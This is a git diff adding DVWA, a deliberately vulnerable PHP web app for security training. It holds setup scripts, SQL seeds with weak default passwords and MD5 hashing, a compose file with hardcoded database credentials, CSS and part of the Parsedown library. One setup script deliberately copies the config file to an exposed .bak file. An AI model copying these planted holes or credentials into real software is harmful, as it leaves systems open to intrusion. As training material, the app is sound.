+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
About
+Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment
+Pre-August 2020, All material is copyright 2008-2015 RandomStorm & Ryan Dewhurst.
+Ongoing, All material is copyright Robin Wood and probably Ryan Dewhurst.
+ +Links
+-
+
- Project Home: " . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA' ) . " +
- Bug Tracker: " . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA/issues' ) . " +
- Wiki: " . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA/wiki' ) . " +
Credits
+-
+
- Brooks Garrett: " . dvwaExternalLinkUrlGet( 'http://brooksgarrett.com/','www.brooksgarrett.com' ) . " +
- Craig +
- g0tmi1k: " . dvwaExternalLinkUrlGet( 'https://blog.g0tmi1k.com/','g0tmi1k.com' ) . " +
- Jamesr: " . dvwaExternalLinkUrlGet( 'https://www.creativenucleus.com/','www.creativenucleus.com' ) . " +
- Jason Jones +
- RandomStorm +
- Ryan Dewhurst: " . dvwaExternalLinkUrlGet( 'https://wpscan.com/','wpscan.com' ) . " +
- Shinkurt: " . dvwaExternalLinkUrlGet( 'http://www.paulosyibelo.com/','www.paulosyibelo.com' ) . " +
- Tedi Heriyanto: " . dvwaExternalLinkUrlGet( 'http://tedi.heriyanto.net/','tedi.heriyanto.net' ) . " +
- Tom Mackenzie +
- Robin Wood: " . dvwaExternalLinkUrlGet( 'https://digi.ninja/','digi.ninja' ) . " +
- Zhengyang Song: " . dvwaExternalLinkUrlGet( 'https://github.com/songzy12/','songzy12' ) . " +
License
+Damn Vulnerable Web Application (DVWA) is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version.
+ +Development
+Everyone is welcome to contribute and help make DVWA as successful as it can be. All contributors can have their name and link (if they wish) placed in the credits section. To contribute pick an Issue from the Project Home to work on or submit a patch to the Issues list.
+\n"; + +dvwaHtmlEcho( $page ); + +exit; + +?> diff --git a/DVWA/compose.yml b/DVWA/compose.yml new file mode 100644 index 00000000..adc9610a --- /dev/null +++ b/DVWA/compose.yml @@ -0,0 +1,39 @@ +volumes: + dvwa: + + +networks: + dvwa: + + +services: + dvwa: + build: . + image: ghcr.io/digininja/dvwa:latest + # Change `always` to `build` to build from local source + pull_policy: always + environment: + - DB_SERVER=db + depends_on: + - db + # Uncomment the next 2 lines to serve local source + # volumes: + # - ./:/var/www/html + networks: + - dvwa + ports: + - 127.0.0.1:4280:80 + restart: unless-stopped + + db: + image: docker.io/library/mariadb:10 + environment: + - MYSQL_ROOT_PASSWORD=dvwa + - MYSQL_DATABASE=dvwa + - MYSQL_USER=dvwa + - MYSQL_PASSWORD=p@ssw0rd + volumes: + - dvwa:/var/lib/mysql + networks: + - dvwa + restart: unless-stopped diff --git a/DVWA/config/config.inc.php.dist b/DVWA/config/config.inc.php.dist new file mode 100644 index 00000000..269f367b --- /dev/null +++ b/DVWA/config/config.inc.php.dist @@ -0,0 +1,56 @@ + diff --git a/DVWA/database/create_mssql_db.sql b/DVWA/database/create_mssql_db.sql new file mode 100644 index 00000000..a1657f6c --- /dev/null +++ b/DVWA/database/create_mssql_db.sql @@ -0,0 +1,15 @@ +/* +In case I get round to adding MS SQL support, this creates and populates the tables. +*/ + +CREATE DATABASE dvwa; + +USE dvwa; + +CREATE TABLE users (user_id INT PRIMARY KEY,first_name VARCHAR(15),last_name VARCHAR(15), [user] VARCHAR(15), password VARCHAR(32),avatar VARCHAR(70), last_login DATETIME, failed_login INT); + +INSERT INTO users VALUES ('1','admin','admin','admin',CONVERT(NVARCHAR(32),HashBytes('MD5', 'password'),2),'admin.jpg', GETUTCDATE(), '0'), ('2','Gordon','Brown','gordonb',CONVERT(NVARCHAR(32),HashBytes('MD5', 'abc123'),2),'gordonb.jpg', GETUTCDATE(), '0'), ('3','Hack','Me','1337',CONVERT(NVARCHAR(32),HashBytes('MD5', 'charley'),2),'1337.jpg', GETUTCDATE(), '0'), ('4','Pablo','Picasso','pablo',CONVERT(NVARCHAR(32),HashBytes('MD5', 'letmein'),2),'pablo.jpg', GETUTCDATE(), '0'), ('5', 'Bob','Smith','smithy',CONVERT(NVARCHAR(32),HashBytes('MD5', 'password'),2),'smithy.jpg', GETUTCDATE(), '0'); + +CREATE TABLE guestbook (comment_id INT IDENTITY(1,1) PRIMARY KEY, comment VARCHAR(300), name VARCHAR(100),2); + +INSERT INTO guestbook (comment, name) VALUES ('This is a test comment.','test'); diff --git a/DVWA/database/create_oracle_db.sql b/DVWA/database/create_oracle_db.sql new file mode 100644 index 00000000..7bf70f2a --- /dev/null +++ b/DVWA/database/create_oracle_db.sql @@ -0,0 +1,27 @@ +/* Create a copy of the database and contents in Oracle */ + +CREATE TABLE users ( +user_id NUMBER NOT NULL, +first_name varchar(20) DEFAULT NULL, +last_name varchar(20) DEFAULT NULL, +"user" varchar(20) DEFAULT NULL, +password varchar(20) DEFAULT NULL, +avatar varchar(20) DEFAULT NULL, +last_login TIMESTAMP, +failed_login NUMBER, +PRIMARY KEY (user_id) +); + +CREATE TABLE guestbook +(comment_id NUMBER GENERATED BY DEFAULT AS IDENTITY, +"comment" VARCHAR(100) DEFAULT NULL, +"name" VARCHAR(100) NOT NULL, +PRIMARY KEY (comment_id)); + +INSERT INTO users values ('1','admin','admin','admin',('password'),'admin.jpg', sysdate, '0'); +INSERT INTO users values ('2','Gordon','Brown','gordonb',('abc123'),'gordonb.jpg', sysdate, '0'); +INSERT INTO users values ('3','Hack','Me','1337',('charley'),'1337.jpg', sysdate, '0'); +INSERT INTO users values ('4','Pablo','Picasso','pablo',('letmein'),'pablo.jpg', sysdate, '0'); +INSERT INTO users values ('5','Bob','Smith','smithy',('password'),'smithy.jpg', sysdate, '0'); + +INSERT INTO guestbook ("comment", "name") VALUES ('What a brilliant app!', 'Marcel Marceau'); diff --git a/DVWA/database/create_postgresql_db.sql b/DVWA/database/create_postgresql_db.sql new file mode 100644 index 00000000..20e96147 --- /dev/null +++ b/DVWA/database/create_postgresql_db.sql @@ -0,0 +1,7 @@ +CREATE TABLE users (user_id INT PRIMARY KEY,first_name VARCHAR(15),last_name VARCHAR(15), "user" VARCHAR(15), password VARCHAR(32),avatar VARCHAR(70), last_login timestamp, failed_login INT); + +INSERT INTO users VALUES ('1','admin','admin','admin',MD5('password'),'admin.jpg', CURRENT_TIMESTAMP, '0'),('2','Gordon','Brown','gordonb',MD5('abc123'),'gordonb.jpg', CURRENT_TIMESTAMP, '0'), ('3','Hack','Me','1337',MD5('charley'),'1337.jpg', CURRENT_TIMESTAMP, '0'), ('4','Pablo','Picasso','pablo',MD5('letmein'),'pablo.jpg', CURRENT_TIMESTAMP, '0'), ('5', 'Bob','Smith','smithy',MD5('password'),'smithy.jpg', CURRENT_TIMESTAMP, '0'); + +CREATE TABLE guestbook (comment_id serial PRIMARY KEY, comment VARCHAR(300), name VARCHAR(100)); + +INSERT INTO guestbook (comment, name) VALUES ('This is a test comment.','test'); diff --git a/DVWA/database/create_sqlite_db.sql b/DVWA/database/create_sqlite_db.sql new file mode 100644 index 00000000..08463dc1 --- /dev/null +++ b/DVWA/database/create_sqlite_db.sql @@ -0,0 +1,27 @@ +CREATE TABLE `users` ( +`user_id` int NOT NULL, +`first_name` text DEFAULT NULL, +`last_name` text DEFAULT NULL, +`user` text DEFAULT NULL, +`password` text DEFAULT NULL, +`avatar` text DEFAULT NULL, +`last_login` datetime, +`failed_login` int, +PRIMARY KEY (`user_id`) +); + +CREATE TABLE `guestbook` ( +`comment_id` int, +`comment` text default null, +`name` text DEFAULT NULL, +PRIMARY KEY (`comment_id`) +); + + +insert into users values ('1','admin','admin','admin',('password'),'admin.jpg', DATE(), '0'); +insert into users values ('2','Gordon','Brown','gordonb',('abc123'),'gordonb.jpg', DATE(), '0'); +insert into users values ('3','Hack','Me','1337',('charley'),'1337.jpg', DATE(), '0'); +insert into users values ('4','Pablo','Picasso','pablo',('letmein'),'pablo.jpg', DATE(), '0'); +insert into users values ('5','Bob','Smith','smithy',('password'),'smithy.jpg', DATE(), '0');; + +insert into guestbook values ('1', 'What a brilliant app!', 'Marcel Marceau'); diff --git a/DVWA/database/sqli.db b/DVWA/database/sqli.db new file mode 100644 index 00000000..53611582 Binary files /dev/null and b/DVWA/database/sqli.db differ diff --git a/DVWA/database/sqli.db.dist b/DVWA/database/sqli.db.dist new file mode 100644 index 00000000..d8e12b7b Binary files /dev/null and b/DVWA/database/sqli.db.dist differ diff --git a/DVWA/docs/DVWA_v1.3.pdf b/DVWA/docs/DVWA_v1.3.pdf new file mode 100644 index 00000000..fb3e9529 Binary files /dev/null and b/DVWA/docs/DVWA_v1.3.pdf differ diff --git a/DVWA/docs/graphics/docker/detail.png b/DVWA/docs/graphics/docker/detail.png new file mode 100644 index 00000000..b428ff26 Binary files /dev/null and b/DVWA/docs/graphics/docker/detail.png differ diff --git a/DVWA/docs/graphics/docker/overview.png b/DVWA/docs/graphics/docker/overview.png new file mode 100644 index 00000000..990f5a8d Binary files /dev/null and b/DVWA/docs/graphics/docker/overview.png differ diff --git a/DVWA/docs/pdf.html b/DVWA/docs/pdf.html new file mode 100644 index 00000000..43eb3a77 --- /dev/null +++ b/DVWA/docs/pdf.html @@ -0,0 +1 @@ +Damn Vulnerable Web Application (DVWA) Official Documentation PDF v1.3 diff --git a/DVWA/dvwa/css/help.css b/DVWA/dvwa/css/help.css new file mode 100644 index 00000000..aaf04c9e --- /dev/null +++ b/DVWA/dvwa/css/help.css @@ -0,0 +1,45 @@ +body { + background-color: #e7e7e7; + font-family: Arial, Helvetica, sans-serif; + font-size: 13px; +} + +h1 { + font-size: 25px; +} + +div#container { +} + +div#code { + background-color: #ffffff; +} + +div#area { + margin-left: 30px; +} + +span.spoiler { + background-color: black; + color: black; +} + +/* === Dark theme === */ +body.dark { + background: #2f2f2f; + color: #f8fafa; +} + +body.dark a { + color: #99cc33; +} + +body.dark div#code { + background-color: #2f2f2f; + color: #f8fafa; +} + +body.dark table { + background-color: #2f2f2f; + border: none !important; +} \ No newline at end of file diff --git a/DVWA/dvwa/css/login.css b/DVWA/dvwa/css/login.css new file mode 100644 index 00000000..4e397327 --- /dev/null +++ b/DVWA/dvwa/css/login.css @@ -0,0 +1,59 @@ +body { + background: #fefffe; + font: 12px/15px Arial, Helvetica, sans-serif; + line-height: 20px; + color: #6b6b6b; +} + +#wrapper { + text-align: center; + margin: 0 auto; +} + +#content { + display: inline-block; + padding: 20px; + width: auto; +} + +#footer { + position: absolute; + width: 100%; + height: 50px; + bottom: 0px; + left: 0px; +} + +label { + float: left; + text-align: right; + margin-right: 0.5em; + display: block; + overflow: hidden; + padding-right: 50px; + font-weight: bold; +} + +.loginInput { + float: left; + color: #6B6B6B; + width: 320px; + background-color: #F4F4F4; + border: 1px; + border-style: solid; + border-color: #c4c4c4; + padding: 6px; + margin-bottom: 12px; +} + +fieldset { + width: 350px; + padding: 10px 20px 10px 20px; + overflow: hidden; + border-style: none; +} + +p { + font-size: 10px; +} + diff --git a/DVWA/dvwa/css/main.css b/DVWA/dvwa/css/main.css new file mode 100644 index 00000000..83b45091 --- /dev/null +++ b/DVWA/dvwa/css/main.css @@ -0,0 +1,335 @@ +body { + margin: 0; + color: #2f2f2f; + font: 12px/15px Arial, Helvetica, sans-serif; + min-width: 981px; + height: 100%; + position: relative; +} + +body.home { + background: #e7e7e7; +} + +div.clear { + clear: both; +} + +a { + color: #99cc33; + text-decoration: underline; + font-weight: bold; +} + +a img { + border: 0; +} + +a: hover { + text-decoration: none; +} + +input, textarea, select { + font: 100% arial,sans-serif; + vertical-align: middle; +} + +form,fieldset { + margin: 0; + padding: 0; + border-style: none; +} + +em { + font-weight: bold; + font-style: normal; +} + +h1, h2, h3, h4, h5, h6 { + margin-top: 0px; +} + +h1 { + font-size: 200%; +} + +h2 { + font-size: 160%; +} + + +h3 { + font-size: 130%; +} + +hr { + border-width: 0px; + color: #C3D9FF; + background-color: #C3D9FF; + height: 1px; +} + +ul.menuBlocks { + list-style-type: none; + padding-left: 0px; + margin-top: 0px; + margin-bottom: 0px; + margin-left: 0px; +} + +ul + ul, ul + ul.menuBlocks, ul + h1, ul + h2, ul + p { + margin-top: 20px; +} + +.fixed { + font-family: Fixed, Courier, monospace; + font-size: 13px; +} + +div.nearly { + border: 2px solid #0000ff; + padding: 10px 20px 10px 20px; + margin-top: 15px; + margin-bottom: 15px; +} + +div.success { + border: 2px solid #00ff00; + padding: 10px 20px 10px 20px; + text-align: center; + font-weight: bold; + margin-top: 15px; + margin-bottom: 15px; +} + +div.warning { + border: 2px solid #ff0000; + padding: 10px 20px 10px 20px; + color: #800000; + margin-top: 15px; + margin-bottom: 15px; +} + +div.warning h1 { + color: #ff0000; +} + +div.message { + border: 1px solid #C0C0C0; + padding: 5px; + margin: 10px 0px 10px 0px; + background-color: #f8fafa; + width: 45%; +} + +div#container { + width: 900px; + height: 100%; + margin-left: auto; + margin-right: auto; + background: #f4f4f4; + font-size: 13px; +} + +div#header { + position: relative; + padding: 10px; + overflow: hidden; + background: #2f2f2f; + border-bottom: 5px solid #A1CC33; + text-align: center; +} + +div#system_info { + padding: 10px; + text-align: right; +} + +div#main_body { + float: right; + width: 693px; + background: #f4f4f4; + padding-top: 20px; + padding-bottom: 10px; + font-size: 13px; +} + +div.body_padded { + padding-left: 20px; + padding-right: 20px; +} + +div#main_menu { + float: left; + width: 200px; + height: 100%; + background-color: #f4f4f4; + padding-top: 10px; + padding-bottom: 10px; +} + +div#main_menu li { + border-width: 1px; + border-style: solid; + border-color: #D2D4D4 #6B778C #6B778C #D2D4D4; + padding: 3px 5px 3px 5px; + margin-bottom: 3px; + background-color: #bebebe; +} + +div#main_menu li a { + color: #000000; + text-decoration: none; + display: block; +} + +div#main_menu li:hover { + background-color: #ccc; +} + + +div#main_menu li.selected { + border-color: #758DAE #758DAE #758DAE #758DAE; + background-color: #99cc33; +} + +div#main_menu li.selected a { + color: #F9F7ED; +} + +div#main_menu li: hover { + border-color: #D2D4D4; +} + +div#main_menu li: hover a { + color: #F9F7ED; +} + +div#main_menu_padded { + padding: 15px; +} + +div#footer { + color: #999999; + background: #2f2f2f; + padding: 10px; + text-align: center; + border-top: 5px solid #A1CC33; +} + +.popup_button { + border-width: 1px; + border-style: solid; + border-color: #D2D4D4 #6B778C #6B778C #D2D4D4; + padding: 3px 5px; + margin-bottom: 3px; + background-color: #bebebe; + font-weight: bold; + float: right; + cursor: pointer; + color: #000000; +} + +.popup_button:hover { + color: white; + background-color: #A1CC33; +} + + + + +div.vulnerable_code_area { + background-color: #f8fafa; + border-width: 1px; + border-style: solid; + border-color: #000000; + padding: 10px 20px 10px 20px; + margin-bottom: 20px; +} + +div#guestbook_comments { + width: 45%; + background-color: #f8fafa; + border-width: 1px; + border-style: solid; + border-color: #C0C0C0; + padding: 5px 10px 5px 10px; + margin-bottom: 5px; +} + +div#idslog { + border: 1px solid #C0C0C0; + padding: 5px; + margin: 10px 0px 10px 0px; + background-color: #f8fafa; +} + +pre { + color: red; +} + +div.submenu { + border-bottom: 1px solid #000000; + margin-bottom: 15px; + padding: 4px 0px 10px 0px; + font-size: 13px; +} + +span.submenu_item { + padding: 0px 10px 0px 10px; +} + +span.submenu_item + span.submenu_item { + border-left: 1px dashed #000000; + font-size: 13px; +} + +span.selected { + font-weight: bold; +} + +span.success { + + color:green; +} + +span.failure { + color:red; + font-weight: bold; +} + +.theme-icon { + position: absolute; + right: 0; +} + +.theme-icon img { + height: 32px; + width: 32px; +} + + +/* === Dark theme === */ +body.home.dark { + background: #2f2f2f; + color: #f8fafa; +} + +body.home.dark #container, +body.home.dark #main_menu, +body.home.dark #main_body, +body.home.dark #system_info { + background: #2f2f2f; +} + +body.home.dark .vulnerable_code_area { + background: #2f2f2f; +} + +body.home.dark .message { + background-color: #2f2f2f; +} + +body.home.dark div#guestbook_comments { + background-color: #2f2f2f; +} \ No newline at end of file diff --git a/DVWA/dvwa/css/source.css b/DVWA/dvwa/css/source.css new file mode 100644 index 00000000..58fa5a1c --- /dev/null +++ b/DVWA/dvwa/css/source.css @@ -0,0 +1,47 @@ +body { + background-color: #e7e7e7; + font-family: Arial, Helvetica, sans-serif; + font-size: 13px; +} + +h1 { + font-size: 25px; +} + +div#container { +} + +div#code { + background-color: #ffffff; +} + +div#area { + margin-left: 30px; +} + +.loginSuccess { + color: #638323; +} + +.loginFail { + color: #a50a0a; +} + +/* === Dark theme === */ +body.dark { + background: #2f2f2f; + color: #f8fafa; +} + +body.dark a { + color: #99cc33; +} + +body.dark div#code { + background-color: #bdbdbd; +} + +body.dark table { + background-color: #2f2f2f; + border: none !important; +} \ No newline at end of file diff --git a/DVWA/dvwa/images/dollar.png b/DVWA/dvwa/images/dollar.png new file mode 100644 index 00000000..5bc12b98 Binary files /dev/null and b/DVWA/dvwa/images/dollar.png differ diff --git a/DVWA/dvwa/images/lock.png b/DVWA/dvwa/images/lock.png new file mode 100644 index 00000000..16979f15 Binary files /dev/null and b/DVWA/dvwa/images/lock.png differ diff --git a/DVWA/dvwa/images/login_logo.png b/DVWA/dvwa/images/login_logo.png new file mode 100644 index 00000000..11c59f46 Binary files /dev/null and b/DVWA/dvwa/images/login_logo.png differ diff --git a/DVWA/dvwa/images/logo.png b/DVWA/dvwa/images/logo.png new file mode 100644 index 00000000..b98bcf6d Binary files /dev/null and b/DVWA/dvwa/images/logo.png differ diff --git a/DVWA/dvwa/images/spanner.png b/DVWA/dvwa/images/spanner.png new file mode 100644 index 00000000..efafbcff Binary files /dev/null and b/DVWA/dvwa/images/spanner.png differ diff --git a/DVWA/dvwa/images/theme-light-dark.png b/DVWA/dvwa/images/theme-light-dark.png new file mode 100644 index 00000000..cf844e08 Binary files /dev/null and b/DVWA/dvwa/images/theme-light-dark.png differ diff --git a/DVWA/dvwa/images/warning.png b/DVWA/dvwa/images/warning.png new file mode 100644 index 00000000..6c9e4705 Binary files /dev/null and b/DVWA/dvwa/images/warning.png differ diff --git a/DVWA/dvwa/includes/DBMS/MySQL.php b/DVWA/dvwa/includes/DBMS/MySQL.php new file mode 100644 index 00000000..79ac9347 --- /dev/null +++ b/DVWA/dvwa/includes/DBMS/MySQL.php @@ -0,0 +1,104 @@ +Please check the config file.Database Error #" . mysqli_connect_errno() . ": " . mysqli_connect_error() . "." ); + if ($_DVWA[ 'db_user' ] == "root") { + dvwaMessagePush( 'Your database user is root, if you are using MariaDB, this will not work, please read the README.md file.' ); + } + dvwaPageReload(); +} + +// Create database +$drop_db = "DROP DATABASE IF EXISTS {$_DVWA[ 'db_database' ]};"; +if( !@mysqli_query($GLOBALS["___mysqli_ston"], $drop_db ) ) { + dvwaMessagePush( "Could not drop existing database
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} + +$create_db = "CREATE DATABASE {$_DVWA[ 'db_database' ]};"; +if( !@mysqli_query($GLOBALS["___mysqli_ston"], $create_db ) ) { + dvwaMessagePush( "Could not create database
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "Database has been created." ); + + +// Create table 'users' +if( !@((bool)mysqli_query($GLOBALS["___mysqli_ston"], "USE " . $_DVWA[ 'db_database' ])) ) { + dvwaMessagePush( 'Could not connect to database.' ); + dvwaPageReload(); +} + +$create_tb = "CREATE TABLE users (user_id int(6),first_name varchar(15),last_name varchar(15), user varchar(15), password varchar(32),avatar varchar(70), last_login TIMESTAMP, failed_login INT(3), PRIMARY KEY (user_id));"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $create_tb ) ) { + dvwaMessagePush( "Table could not be created
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "'users' table was created." ); + + +// Insert some data into users +$base_dir= str_replace ("setup.php", "", $_SERVER['SCRIPT_NAME']); +$avatarUrl = $base_dir . 'hackable/users/'; + +$insert = "INSERT INTO users VALUES + ('1','admin','admin','admin',MD5('password'),'{$avatarUrl}admin.jpg', NOW(), '0'), + ('2','Gordon','Brown','gordonb',MD5('abc123'),'{$avatarUrl}gordonb.jpg', NOW(), '0'), + ('3','Hack','Me','1337',MD5('charley'),'{$avatarUrl}1337.jpg', NOW(), '0'), + ('4','Pablo','Picasso','pablo',MD5('letmein'),'{$avatarUrl}pablo.jpg', NOW(), '0'), + ('5','Bob','Smith','smithy',MD5('password'),'{$avatarUrl}smithy.jpg', NOW(), '0');"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'users' table
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "Data inserted into 'users' table." ); + + +// Create guestbook table +$create_tb_guestbook = "CREATE TABLE guestbook (comment_id SMALLINT UNSIGNED NOT NULL AUTO_INCREMENT, comment varchar(300), name varchar(100), PRIMARY KEY (comment_id));"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $create_tb_guestbook ) ) { + dvwaMessagePush( "Table could not be created
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "'guestbook' table was created." ); + + +// Insert data into 'guestbook' +$insert = "INSERT INTO guestbook VALUES ('1','This is a test comment.','test');"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'guestbook' table
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "Data inserted into 'guestbook' table." ); + + + + +// Copy .bak for a fun directory listing vuln +$conf = DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php'; +$bakconf = DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php.bak'; +if (file_exists($conf)) { + // Who cares if it fails. Suppress. + @copy($conf, $bakconf); +} + +dvwaMessagePush( "Backup file /config/config.inc.php.bak automatically created" ); + +// Done +dvwaMessagePush( "Setup successful!" ); + +if( !dvwaIsLoggedIn()) + dvwaMessagePush( "Please login." ); +dvwaPageReload(); + +?> diff --git a/DVWA/dvwa/includes/DBMS/PGSQL.php b/DVWA/dvwa/includes/DBMS/PGSQL.php new file mode 100644 index 00000000..a50d4c37 --- /dev/null +++ b/DVWA/dvwa/includes/DBMS/PGSQL.php @@ -0,0 +1,105 @@ +Please check the config file." ); + dvwaPageReload(); +} + +// Create database +$drop_db = "DROP DATABASE IF EXISTS {$_DVWA[ 'db_database' ]};"; + +if( !@pg_query($drop_db) ) { + dvwaMessagePush( "Could not drop existing database
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +$create_db = "CREATE DATABASE {$_DVWA[ 'db_database' ]};"; + +if( !@pg_query ( $create_db ) ) { + dvwaMessagePush( "Could not create database
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "Database has been created." ); + + +// Connect to server AND connect to the database +$dbconn = @pg_connect("host={$_DVWA[ 'db_server' ]} port={$_DVWA[ 'db_port' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ]}"); + + +// Create table 'users' + +$drop_table = "DROP TABLE IF EXISTS users;"; + +if( !pg_query($drop_table) ) { + dvwaMessagePush( "Could not drop existing users table
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +$create_tb = "CREATE TABLE users (user_id integer UNIQUE, first_name text, last_name text, username text, password text, avatar text, PRIMARY KEY (user_id));"; + +if( !pg_query( $create_tb ) ) { + dvwaMessagePush( "Table could not be created
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "'users' table was created." ); + +// Get the base directory for the avatar media... +$baseUrl = 'http://'.$_SERVER[ 'SERVER_NAME' ].$_SERVER[ 'PHP_SELF' ]; +$stripPos = strpos( $baseUrl, 'dvwa/setup.php' ); +$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/'; + +$insert = "INSERT INTO users VALUES + ('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'), + ('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'), + ('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'), + ('4','Pablo','Picasso','pablo',MD5('letmein'),'{$baseUrl}pablo.jpg'), + ('5','bob','smith','smithy',MD5('password'),'{$baseUrl}smithy.jpg');"; +if( !pg_query( $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'users' table
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "Data inserted into 'users' table." ); + +// Create guestbook table + +$drop_table = "DROP table IF EXISTS guestbook;"; + +if( !@pg_query($drop_table) ) { + dvwaMessagePush( "Could not drop existing users table
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +$create_tb_guestbook = "CREATE TABLE guestbook (comment text, name text, comment_id SERIAL PRIMARY KEY);"; + +if( !pg_query( $create_tb_guestbook ) ) { + dvwaMessagePush( "guestbook table could not be created
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "'guestbook' table was created." ); + +// Insert data into 'guestbook' +$insert = "INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')"; + +if( !pg_query( $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'guestbook' table
SQL: " . pg_last_error() ); + dvwaPageReload(); +} +dvwaMessagePush( "Data inserted into 'guestbook' table." ); + +dvwaMessagePush( "Setup successful!" ); +dvwaPageReload(); + +pg_close($dbconn); + +?> diff --git a/DVWA/dvwa/includes/Parsedown.php b/DVWA/dvwa/includes/Parsedown.php new file mode 100644 index 00000000..ae0cbdec --- /dev/null +++ b/DVWA/dvwa/includes/Parsedown.php @@ -0,0 +1,1994 @@ +textElements($text); + + # convert to markup + $markup = $this->elements($Elements); + + # trim line breaks + $markup = trim($markup, "\n"); + + return $markup; + } + + protected function textElements($text) + { + # make sure no definitions are set + $this->DefinitionData = array(); + + # standardize line breaks + $text = str_replace(array("\r\n", "\r"), "\n", $text); + + # remove surrounding line breaks + $text = trim($text, "\n"); + + # split text into lines + $lines = explode("\n", $text); + + # iterate through lines to identify blocks + return $this->linesElements($lines); + } + + # + # Setters + # + + function setBreaksEnabled($breaksEnabled) + { + $this->breaksEnabled = $breaksEnabled; + + return $this; + } + + protected $breaksEnabled; + + function setMarkupEscaped($markupEscaped) + { + $this->markupEscaped = $markupEscaped; + + return $this; + } + + protected $markupEscaped; + + function setUrlsLinked($urlsLinked) + { + $this->urlsLinked = $urlsLinked; + + return $this; + } + + protected $urlsLinked = true; + + function setSafeMode($safeMode) + { + $this->safeMode = (bool) $safeMode; + + return $this; + } + + protected $safeMode; + + function setStrictMode($strictMode) + { + $this->strictMode = (bool) $strictMode; + + return $this; + } + + protected $strictMode; + + protected $safeLinksWhitelist = array( + 'http://', + 'https://', + 'ftp://', + 'ftps://', + 'mailto:', + 'tel:', + 'data:image/png;base64,', + 'data:image/gif;base64,', + 'data:image/jpeg;base64,', + 'irc:', + 'ircs:', + 'git:', + 'ssh:', + 'news:', + 'steam:', + ); + + # + # Lines + # + + protected $BlockTypes = array( + '#' => array('Header'), + '*' => array('Rule', 'List'), + '+' => array('List'), + '-' => array('SetextHeader', 'Table', 'Rule', 'List'), + '0' => array('List'), + '1' => array('List'), + '2' => array('List'), + '3' => array('List'), + '4' => array('List'), + '5' => array('List'), + '6' => array('List'), + '7' => array('List'), + '8' => array('List'), + '9' => array('List'), + ':' => array('Table'), + '<' => array('Comment', 'Markup'), + '=' => array('SetextHeader'), + '>' => array('Quote'), + '[' => array('Reference'), + '_' => array('Rule'), + '`' => array('FencedCode'), + '|' => array('Table'), + '~' => array('FencedCode'), + ); + + # ~ + + protected $unmarkedBlockTypes = array( + 'Code', + ); + + # + # Blocks + # + + protected function lines(array $lines) + { + return $this->elements($this->linesElements($lines)); + } + + protected function linesElements(array $lines) + { + $Elements = array(); + $CurrentBlock = null; + + foreach ($lines as $line) + { + if (chop($line) === '') + { + if (isset($CurrentBlock)) + { + $CurrentBlock['interrupted'] = (isset($CurrentBlock['interrupted']) + ? $CurrentBlock['interrupted'] + 1 : 1 + ); + } + + continue; + } + + while (($beforeTab = strstr($line, "\t", true)) !== false) + { + $shortage = 4 - mb_strlen($beforeTab, 'utf-8') % 4; + + $line = $beforeTab + . str_repeat(' ', $shortage) + . substr($line, strlen($beforeTab) + 1) + ; + } + + $indent = strspn($line, ' '); + + $text = $indent > 0 ? substr($line, $indent) : $line; + + # ~ + + $Line = array('body' => $line, 'indent' => $indent, 'text' => $text); + + # ~ + + if (isset($CurrentBlock['continuable'])) + { + $methodName = 